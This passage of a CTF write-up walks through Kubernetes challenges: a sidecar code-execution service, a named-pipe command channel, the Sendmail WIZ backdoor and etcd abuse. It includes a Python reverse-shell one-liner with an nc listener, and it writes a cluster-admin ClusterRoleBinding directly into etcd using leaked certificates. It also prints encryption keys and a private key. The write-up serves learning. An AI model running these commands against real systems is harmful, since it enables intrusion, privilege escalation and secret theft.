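root@entry-pod:/tmp# echo 'import time; time.sleep(10)' > sleep.cyl0ck
root@entry-pod:/tmp# curl entry.sidecars:8087/upload -F "file=@sleep.cyl0ck"
root@entry-pod:/tmp# time curl entry.sidecars:8087/execute/sleep.cyl0ck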
Time for a reverse shell.
root@entry-pod:/tmp# cat test.cyl0ck
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
$ nc -nlvp 8080
Listening on 0.0.0.0 8080
Connection received on 5.78.133.51 34470
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Success.
Now time for further enumeration. Looking at the mounts, one entry drew my attention.
/ # mount
/ # cat /proc/self/mounts
[..SNIP..]
/dev/sda1 /var/.hidden ext4 rw,relatime 0 0
[..SNIP..]
I wonder what’s in here ;)
/ # ls -alp /var/.hidden
total 8
drwxrwxrwx 2 root root 4096 Aug 10 00:44 ./
drwxr-xr-x 1 root root 4096 Aug 10 00:44 ../
prw-r--r-- 1 root root 0 Aug 10 00:44 whats-weird-about-this-file.tar
Oh huh. That’s new. That’s a named pipe. I wonder what that is doing.
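(For anyone unfamiliar: a named pipe, or FIFO, blocks a writer until something reads from the other end, and vice versa. A quick local demo, unrelated to the challenge:)
$ mkfifo /tmp/demo-pipe
$ echo hello > /tmp/demo-pipe &
$ cat /tmp/demo-pipe
hello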
Let's try listening to it, to see if anything is being written to it.
/var/.hidden # tail -f whats-weird-about-this-file.tar
After a while of listening, nada.
Let’s try submitting some entries as well then.
(sender)
/var/.hidden # echo hi > whats-weird-about-this-file.tar
/var/.hidden # echo foo > whats-weird-about-this-file.tar
(tail -f)
hi
/bin/sh: foo: not found
Wait, what? Is this executing the commands that I submit?
(sender)
/var/.hidden # echo id > whats-weird-about-this-file.tar
(tail -f)
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Excellent. Let’s see what we can find.
(sender)
/var/.hidden # echo ls > whats-weird-about-this-file.tar
/var/.hidden # echo cat flag.txt > whats-weird-about-this-file.tar
(tail -f)
bin
dev
etc
flag.txt
home
lib
media
mnt
opt
proc
product_name
product_uuid
root
run
sbin
sidecar.py
srv
sys
tmp
usr
var
{flag-a-pods-ctrs-share-ipc-and-net-ns-did-you-find-dev-shm}
Nice.
Challenge 6 - wizards-communicate by Jay Beale
This is a challenge I did not manage to complete during the CTF itself. However, after a hint from one of the organisers afterwards, I got it.
Wizards of DEF CON, please kubectl exec into entry-pod in the wizards-communicate namespace.
Same as before, we end up in entry-pod. I do a lot of enumeration and barely find anything.
One thing of note I did find through nmap is an SMTP server running on the IP address one above the pod's. However, I have little information about it; I attempt to play with it a bit but nothing springs out.
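For reference, the discovery boiled down to scanning the pod's neighbouring addresses, something like this (a reconstruction, assuming nmap is installed in the pod; the pod's own address is one below the 192.168.24.194 used in the session below):
/ # ip addr show eth0
/ # nmap -Pn -T4 -p- 192.168.24.194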
After the CTF completes, one of the organisers informs me about this vulnerability (the old Sendmail WIZ debug backdoor), and that there should have been a hint to it within the pod. The vulnerability is a debug command that allows for remote code execution.
Using this new-found information, we can quickly get the flag.
/ # nc 192.168.24.194 25
220 example.com ESMTP Sendmail
EHLO test
220 example.com ESMTP Sendmail
WIZ
250 OK
Who are you that asks to see the Great and Powerful Oz?
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
ls -lp
total 3464
drwxr-xr-x 2 root root 4096 Jan 26 2024 bin/
drwxr-xr-x 5 root root 360 Aug 9 22:37 dev/
drwxr-xr-x 1 root root 4096 Aug 9 22:37 etc/
drwxrwxrwt 3 root root 100 Aug 9 22:37 flag/
drwxr-xr-x 2 root root 4096 Jan 26 2024 home/
drwxr-xr-x 7 root root 4096 Jan 26 2024 lib/
drwxr-xr-x 5 root root 4096 Jan 26 2024 media/
drwxr-xr-x 2 root root 4096 Jan 26 2024 mnt/
drwxr-xr-x 2 root root 4096 Jan 26 2024 opt/
dr-xr-xr-x 578 root root 0 Aug 9 22:37 proc/
-rw-r--r-- 1 root root 5 Aug 9 22:37 product_name
-rw-r--r-- 1 root root 37 Aug 9 22:37 product_uuid
drwx------ 2 root root 4096 Jan 26 2024 root/
drwxr-xr-x 1 root root 4096 Aug 9 22:37 run/
drwxr-xr-x 2 root root 4096 Jan 26 2024 sbin/
drwxr-xr-x 2 root root 4096 Jan 26 2024 srv/
dr-xr-xr-x 13 root root 0 Aug 9 22:37 sys/
drwxrwxrwt 2 root root 4096 Jan 26 2024 tmp/
drwxr-xr-x 7 root root 4096 Jan 26 2024 usr/
drwxr-xr-x 12 root root 4096 Jan 26 2024 var/
-rwxr-xr-x 1 root root 3481538 Jul 12 20:44 wiz-mail-server
cd flag
exec: "cd": executable file not found in $PATH
ls -l flag/
total 0
lrwxrwxrwx 1 root root 11 Aug 9 22:37 flag -> ..data/flag
cat flag/flag
{flag-dj-cmos-ftw}
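For what it’s worth, the same exchange can be scripted rather than typed interactively. A rough sketch (the sleeps just give the server time to respond; your nc build may want different flags):
$ { printf 'WIZ\r\n'; sleep 1; printf 'cat flag/flag\r\n'; sleep 2; } | nc 192.168.24.194 25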
Challenge 7 - loworbit-kubernoodels
We played around with etcd encryption.
I solved this one in an unintended way. I could see what the intended solution path was, but thought it was too much effort, so I took a slightly different route.
Starting off - permissions.
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
bindings [] [] [get list watch]
configmaps [] [] [get list watch]
endpoints [] [] [get list watch]
events [] [] [get list watch]
limitranges [] [] [get list watch]
namespaces/status [] [] [get list watch]
namespaces [] [] [get list watch]
persistentvolumeclaims/status [] [] [get list watch]
persistentvolumeclaims [] [] [get list watch]
pods/log [] [] [get list watch]
pods/status [] [] [get list watch]
pods [] [] [get list watch]
replicationcontrollers/scale [] [] [get list watch]
replicationcontrollers/status [] [] [get list watch]
replicationcontrollers [] [] [get list watch]
resourcequotas/status [] [] [get list watch]
resourcequotas [] [] [get list watch]
serviceaccounts [] [] [get list watch]
services/status [] [] [get list watch]
services [] [] [get list watch]
controllerrevisions.apps [] [] [get list watch]
daemonsets.apps/status [] [] [get list watch]
daemonsets.apps [] [] [get list watch]
deployments.apps/scale [] [] [get list watch]
deployments.apps/status [] [] [get list watch]
deployments.apps [] [] [get list watch]
replicasets.apps/scale [] [] [get list watch]
replicasets.apps/status [] [] [get list watch]
replicasets.apps [] [] [get list watch]
statefulsets.apps/scale [] [] [get list watch]
statefulsets.apps/status [] [] [get list watch]
statefulsets.apps [] [] [get list watch]
horizontalpodautoscalers.autoscaling/status [] [] [get list watch]
horizontalpodautoscalers.autoscaling [] [] [get list watch]
cronjobs.batch/status [] [] [get list watch]
cronjobs.batch [] [] [get list watch]
jobs.batch/status [] [] [get list watch]
jobs.batch [] [] [get list watch]
endpointslices.discovery.k8s.io [] [] [get list watch]
daemonsets.extensions/status [] [] [get list watch]
daemonsets.extensions [] [] [get list watch]
deployments.extensions/scale [] [] [get list watch]
deployments.extensions/status [] [] [get list watch]
deployments.extensions [] [] [get list watch]
ingresses.extensions/status [] [] [get list watch]
ingresses.extensions [] [] [get list watch]
networkpolicies.extensions [] [] [get list watch]
replicasets.extensions/scale [] [] [get list watch]
replicasets.extensions/status [] [] [get list watch]
replicasets.extensions [] [] [get list watch]
replicationcontrollers.extensions/scale [] [] [get list watch]
ingresses.networking.k8s.io/status [] [] [get list watch]
ingresses.networking.k8s.io [] [] [get list watch]
networkpolicies.networking.k8s.io [] [] [get list watch]
poddisruptionbudgets.policy/status [] [] [get list watch]
poddisruptionbudgets.policy [] [] [get list watch]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
OK, we have access to a lot. Going through a few things, we find a treasure trove in the configmaps.
$ k get -A cm
NAMESPACE NAME DATA AGE
cilium-secrets kube-root-ca.crt 1 11h
default kube-root-ca.crt 1 11h
kube-node-lease kube-root-ca.crt 1 11h
kube-public cluster-info 2 11h
kube-public kube-root-ca.crt 1 11h
kube-system cilium-config 144 11h
kube-system cilium-envoy-config 1 11h
kube-system coredns 1 11h
kube-system encryption-config 1 11h
kube-system etcd-cert 3 11h
kube-system extension-apiserver-authentication 6 11h
kube-system kube-apiserver-legacy-service-account-token-tracking 1 11h
kube-system kube-proxy 2 11h
kube-system kube-root-ca.crt 1 11h
kube-system kubeadm-config 1 11h
kube-system kubelet-config 1 11h
Based on the description, I guess we are interacting with etcd. So let’s enumerate what we can find out about it.
$ k get -n kube-system cm etcd-cert -o yaml
apiVersion: v1
data:
ca.crt: |
-----BEGIN CERTIFICATE-----
MIIC/DCCAeSgAwIBAgIICiQDbEaGVKIwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UE
AxMHZXRjZC1jYTAeFw0yNTA4MDkxNTEzMTNaFw0zNTA4MDcxNTE4MTNaMBIxEDAO
BgNVBAMTB2V0Y2QtY2EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCu
TFjdD968RunH+BM0FWWoKpXJyv+LzhVB3DR9kgJbtv4SxekPVKRyrCZVuPtCVS4t
itA+ly9PEZQFK6mMS6r/T1dVbOjB9E22TomXe8e/IpUimajwKJmhWQIM8LcfKvfq
W8rVJP0oq7mtTikd4RJHnicUbvmek8zIcHZaSyhCsJ4BKF+SnimOsfC/PqiFMcX/
zl8CJXpW3Z9gm7b0CY0H56yiiGsLk/ZGhdL1f/5huN5xaTDhbFa1GQYqxsq0bx+C
6mY721kKvXya8VNk22lqAJrFBetGf5uw7bDQHu/eHe70wmRWH7nbfDH83hmTZJcJ
4/wm9sPRzJ4Y391XLkPBAgMBAAGjVjBUMA4GA1UdDwEB/wQEAwICpDAPBgNVHRMB
Af8EBTADAQH/MB0GA1UdDgQWBBSY5vgkIFVpAZIC6XcISM3wt49vFjASBgNVHREE
CzAJggdldGNkLWNhMA0GCSqGSIb3DQEBCwUAA4IBAQBnqqOnHg6kan8Qz70/akGl
8iR4XKIHHXvRXlNKgKf15iTYCCqGGo/HnMshnKd2CTzOdwcEASGJL6xsL0l41Avt
L/81PeP6CemZard1A1TLy9oIV/IanGim7INSyoL7Xy3dw7FcqClqsxFoKY05lZ70
jG/rGi8+aba3xOvm4lXYJ3JPdrRPArt8ITcJXbriJjYRKXYAprUjKYUcubPFLpBw
bzuU8bIW5HKf7tolXTAY2F7BGZNtIij2aeY8YZNOVcvA6T6VwvTEjJprOv/HQfNX
0WV6Ac2iF+pea8qGyP2u+nXfa1xgYQmxpqMQjY1zIIoatGCjgljlcdkEEoOsxiPG
-----END CERTIFICATE-----
server.crt: |
-----BEGIN CERTIFICATE-----
MIIDTzCCAjegAwIBAgIILcJhDUdwmjgwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UE
AxMHZXRjZC1jYTAeFw0yNTA4MDkxNTEzMTNaFw0yNjA4MDkxNTE4MTNaMBcxFTAT
BgNVBAMTDGt1YmVybm9vZGVsczCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
ggEBAN2Dh9jUfx4n3v4hYGZkC3bKAs7obQ57cq8J04xBEM+N/cRq/vpgGKVeIajN
qYb6fxx9ihqdRGityTChB4EwMIOjytr+/DKL3tz/QJ+QDuUa2EErQ3ySe+NvOOw9
l51TslOOhTev5EsHaTzPnaswNChPtiir3ZOTppTR7Q3hKRjZ80K2gx4tv3ynkgRv
mmDcdXNx83Bm9NMtcIhW8m9jzRdNDHysDGIGriU//aCM5z9kRJs5frpchWckiW2x
CgjNWrA+0K2c+vGeCXr9ZJwQGzTJiLrGxObOYTknTB9KhOEuhRE6UXEJEIrtjEsX
SxuYYsse/RHHzsFG6xAT3xqDbb8CAwEAAaOBozCBoDAOBgNVHQ8BAf8EBAMCBaAw
HQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHwYD
VR0jBBgwFoAUmOb4JCBVaQGSAul3CEjN8LePbxYwQAYDVR0RBDkwN4IMa3ViZXJu
b29kZWxzgglsb2NhbGhvc3SHBCUbu26HBH8AAAGHEAAAAAAAAAAAAAAAAAAAAAEw
DQYJKoZIhvcNAQELBQADggEBAEdmUDF1d2FZmvZ121lAzOOVOFPBPd/Iqx0mVV6w
QS5QsQLK4lQNhtAiEn61lWBL2fIc2urRDuqQ479+rzC/aR2DwqbXZXfiQ0FcWggv
kTUvkH1ZVBc/wAE12VpgrAqjzglzpwJxHqu92gYsweLSZpgasSLUxy0h3oGtTato
qeyvdINpg2dpJcFXIflROsKqfuaa/57kKWnl+oB0RNL7qURvuMbcd1GTKhjYDEhr
Gr9U1XWFpBY5YTBVoYPhKr+n+QbU6bamQ4Jc1MAxy9Ok+AVokbD19Or3/V6+Ea5R
QV7ahmJ0rvnQiT3BOxJGCOARBRzqB38hPRfVZev1dQQLNNU=
-----END CERTIFICATE-----
server.key: |
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3YOH2NR/Hife/iFgZmQLdsoCzuhtDntyrwnTjEEQz439xGr+
+mAYpV4hqM2phvp/HH2KGp1EaK3JMKEHgTAwg6PK2v78Move3P9An5AO5RrYQStD
fJJ742847D2XnVOyU46FN6/kSwdpPM+dqzA0KE+2KKvdk5OmlNHtDeEpGNnzQraD
Hi2/fKeSBG+aYNx1c3HzcGb00y1wiFbyb2PNF00MfKwMYgauJT/9oIznP2REmzl+
ulyFZySJbbEKCM1asD7QrZz68Z4Jev1knBAbNMmIusbE5s5hOSdMH0qE4S6FETpR
cQkQiu2MSxdLG5hiyx79EcfOwUbrEBPfGoNtvwIDAQABAoIBAQCelrSDgF8h79mu
h6bEp4utmCM6jxzE6YzJ1HcoSs0GS9oK7a9vAa2jdykR+WwNvvmSJC7jrwRzDTil
ICSHUUDqfjGVaEiWx5zfC7/wfOqtC/MXdSnz3cvkoJRYTiBl+q4JNFgb7km7jarC
ZsGy9efhlHAN3j3ckjEJCuJ0tWb+6nZLb8BJ/49Onqib3HOWZCAQRP1mYAAlV3PN
8BrPCCRq9B9yoORdZ0SxXXmkqtcd8PHX335T01Ogu0rfaBGapJs4FniRCQrayi1F
h+fgp0VhJDxPMIQwqCcQ+J3QAhs2LMWtRVOP2V02Yd7mN/OWWB5xl5o+iij9hQps
nUxkMGpBAoGBAO7gDliRiaxMaHRfnKiQLrTnangBAIi178f61qdAkTwQ1tklk7qB
bFOObrd7bwe/imFS99Mo1goA0jz70s0IcK+J1VYNG2hYpTnbQhcXkgb2S/5ViFHz
ZeinvQP69XrY2N7/xgFx8/5bKRFBoPjAnLS6RaupCo4fE+9Wgup0oZNlAoGBAO1k
2ZmVEOJa/WKNLrKCSX/V5iWwzNSUiP1rkJISvYJMeKzoqWnv52HrLb/TeBMLWiw3
AgpEppxJ6XpvlRPTady1nUlZp8mpUBCIAIs73Zfi8ztJBUAuT2sH4TALXZOn08XK
KNbXxYPvyI4GEFkshUdDffveIWKjQelW9xaZPdRTAoGBAKyk1vmARmZ22s+xAsJ5
Yqhw0OxmnQIxrFl2m4lKCy3EZeOPWxPi0m4ZdT+7QGXzM4pfsqm0y+1y5oAY6SQy
w267Sarl0jc6SkBkjYGvEWViwU3Sd7HzHmZmRSAJUz40V5nkdjE5MMVXEXldW4At
hZTBQ/VrOSu6nmfOuNPG87hZAoGANNeKCEHCLGCMnm9Gwb12ltoKDMG6Fmepxp82
4w0A2gwjoHl5nHcmTgmHeXec9sBEJitobNizLX7WVcaYrH0Wx2Y1yKoISz9A7y0W
0edVgAWolr2+SXcFfpGWcpdVERT+crx5Mrl84c1yGwsGgJMEZ8SCOppLXCVy+nm9
Lm6V8LkCgYBylpu4cNp67GKC2iURMd3tQGoDZ1JxnKdv7xpSmSMb7KI5Bae5NPoL
WEykLrrkFJeJd7wSZz0eKLYHDJbOrqIaNTkTEMsGfEM95m4aZA6xBIzuoSttKbFT
Goyx3d2E0hJLGjrUu5/364a2M8R02GtWBu0MRv1nGFWsF0yRZinjCA==
-----END RSA PRIVATE KEY-----
kind: ConfigMap
metadata:
creationTimestamp: "2025-08-09T15:27:05Z"
name: etcd-cert
namespace: kube-system
resourceVersion: "1075"
uid: 72d97c28-a07c-4e1d-b53d-117a7bccc16e
Nice, let’s save those.
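One way to dump them out to files (the key names match the data fields shown above):
$ k -n kube-system get cm etcd-cert -o json > etcd-cert.json
$ jq -r '.data["ca.crt"]' etcd-cert.json > ca.crt
$ jq -r '.data["server.crt"]' etcd-cert.json > server.crt
$ jq -r '.data["server.key"]' etcd-cert.json > server.key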
$ k -n kube-system get cm encryption-config -o yaml
apiVersion: v1
data:
enc.yaml: |
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
- secrets
providers:
- aescbc:
keys:
- name: key1
secret: Vcu5Q9tb3pUyahrTtXuIkT7i2deVdw9ITbsoGTYPGgI=
- aesgcm:
keys:
- name: key1
secret: Gj1Ra2YZjVcFVl1QUXxtD6W5zJHU8H/X5kVtBzL+dC0=
- name: key2
secret: RA52KOYk4ZdAWM3JAqKoFksrtBXI3nnlpAPISWFqrPQ=
kind: ConfigMap
metadata:
creationTimestamp: "2025-08-09T15:19:06Z"
name: encryption-config
namespace: kube-system
resourceVersion: "403"
uid: 07462686-875d-45db-abb5-ae78f11ea9b3
OK, so secrets at rest are encrypted. One of the things I had noticed earlier was that a pod had the flag mounted from a secret.
$ k -n default get pods -o yaml
apiVersion: v1
items:
- apiVersion: v1
kind: Pod
metadata:
annotations:
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"flag-reader","namespace":"default"},"spec":{"containers":[{"command":["sleep","3600"],"image":"alpine:3.20","name":"alpine","volumeMounts":[{"mountPath":"/etc/flag","name":"flag-volume","readOnly":true}]}],"volumes":[{"name":"flag-volume","secret":{"secretName":"flag"}}]}}
creationTimestamp: "2025-08-09T16:53:39Z"
name: flag-reader
namespace: default
resourceVersion: "7495"
uid: 4628bdcd-c9f1-4308-baa8-c10dcb68ae5c
spec:
[..SNIP..]
volumes:
- name: flag-volume
secret:
defaultMode: 420
secretName: flag
[..SNIP..]
So it looks like we need to connect to etcd and get the encrypted contents and then decrypt it with one of those keys.
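For completeness, that intended path would probably look roughly like the following. This is an untested sketch: it assumes the flag secret was written with the aescbc key1 provider (the k8s:enc:aescbc:v1:key1: prefix on the stored value tells you which key was used), that the layout after the prefix is a 16-byte IV followed by AES-256-CBC ciphertext, and that auger is around to turn the decrypted protobuf back into YAML.
$ etcdctl --cacert=./ca.crt --cert=./server.crt --key=./server.key --endpoints=37.27.187.110:2379 get /registry/secrets/default/flag --print-value-only > flag.enc
$ dd if=flag.enc of=flag.raw bs=1 skip=23   # drop the 23-byte "k8s:enc:aescbc:v1:key1:" prefix
$ KEY=$(base64 -d <<< Vcu5Q9tb3pUyahrTtXuIkT7i2deVdw9ITbsoGTYPGgI= | xxd -p -c 64)
$ IV=$(head -c 16 flag.raw | xxd -p -c 32)
$ tail -c +17 flag.raw | openssl enc -d -aes-256-cbc -K "$KEY" -iv "$IV" | auger decode
(If the secret had been written with one of the aesgcm keys instead, the layout is a nonce plus GCM ciphertext, and openssl enc alone won’t decrypt it.)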
That sounds like way too much effort.
etcd is the central key-value datastore for all Kubernetes cluster state, and we can write to it directly. So we could instead just make ourselves cluster-admin by injecting a new ClusterRoleBinding straight into etcd. A tool called auger is super useful for this, as it converts YAML manifests to and from the protobuf encoding Kubernetes uses when storing objects in etcd.
Let’s assume the IP of etcd is the same as the API server’s (they usually are), which we can grab from the kubeconfig file.
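For example, pulling the server URL out of the kubeconfig that kubectl is already using:
$ k config view --minify -o jsonpath='{.clusters[0].cluster.server}'
The host part of that URL is where we point etcdctl, just on etcd’s client port 2379 instead of the API server’s port.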
$ etcdctl --cacert=./ca.crt --cert=./server.crt --key=./server.key --endpoints=37.27.187.110:2379 get / --prefix --keys-only | grep secrets
/registry/configmaps/cilium-secrets/kube-root-ca.crt
/registry/namespaces/cilium-secrets
/registry/rolebindings/cilium-secrets/cilium-operator-tlsinterception-secrets
/registry/rolebindings/cilium-secrets/cilium-tlsinterception-secrets
/registry/roles/cilium-secrets/cilium-operator-tlsinterception-secrets
/registry/roles/cilium-secrets/cilium-tlsinterception-secrets
/registry/secrets/default/flag
/registry/secrets/kube-system/bootstrap-token-0h4sqi
/registry/secrets/kube-system/cilium-ca
/registry/secrets/kube-system/hubble-server-certs
/registry/secrets/kube-system/sh.helm.release.v1.cilium.v1
/registry/serviceaccounts/cilium-secrets/default
Nice, both the certificates from the configmap and the guessed IP are correct.
One thing to note: this is a cluster shared with all the other participants, so I need to quickly add the permissions, grab the secret, and then delete the permissions again.
Let’s prepare a quick cluster role binding (saved as binding.yml) once we identify our service account.
$ k auth whoami
ATTRIBUTE VALUE
Username system:serviceaccount:kube-system:ctf-player
UID 68083112-cf00-4f59-b216-e209ca64e03e
Groups [system:serviceaccounts system:serviceaccounts:kube-system system:authenticated]
Extra: authentication.kubernetes.io/credential-id [JTI=2550e7f8-5018-441c-b729-dd04758c2772]
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: skybound
subjects:
- kind: ServiceAccount
name: ctf-player
namespace: kube-system
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
With binding.yml ready, we can write it straight into etcd:
$ cat binding.yml | auger encode | etcdctl --cacert=./ca.crt --cert=./server.crt --key=./server.key --endpoints=37.27.187.110:2379 put /registry/clusterrolebindings/skybound
OK
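Before relying on it, we can sanity-check that the object landed and round-trips cleanly:
$ etcdctl --cacert=./ca.crt --cert=./server.crt --key=./server.key --endpoints=37.27.187.110:2379 get /registry/clusterrolebindings/skybound --print-value-only | auger decode
As the next commands show, the new permissions take effect more or less immediately.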
Now, let’s retrieve the flag and delete the permissions.
$ k -n default get secrets flag -o yaml
apiVersion: v1
data:
flag: e2ZsYWctb25lX29yZGVyX29mX2t1YmVybm9vZGxlc19wbHN9
kind: Secret
metadata:
creationTimestamp: "2025-08-09T16:30:11Z"
name: flag
namespace: default
resourceVersion: "5762"
uid: 95f68c50-1727-4cea-a6ff-4282da943a96
type: Opaque
$ base64 -d <<< e2ZsYWctb25lX29yZGVyX29mX2t1YmVybm9vZGxlc19wbHN9
{flag-one_order_of_kubernoodles_pls}
$ etcdctl --cacert=./ca.crt --cert=./server.crt --key=./server.key --endpoints=37.27.187.110:2379 del /registry/clusterrolebindings/skybound
1
$ k -n default get secrets flag -o yaml
Error from server (Forbidden): secrets "flag" is forbidden: User "system:serviceaccount:kube-system:ctf-player" cannot get resource "secrets" in API group "" in the namespace "default"
Excellent.
Conclusion
That was a fun CTF. There was a very good spread of Kubernetes concepts, some of which I don’t often see in CTFs. The IPC communication through named pipes for code execution was particularly unexpected. There was a slight issue with some of the challenges not having all the details needed to solve them right off the bat, but the organisers were pretty quick to fix things when I raised it with them. Thank you to all the challenge creators and organisers of the CTF.
As always, here is the scoreboard.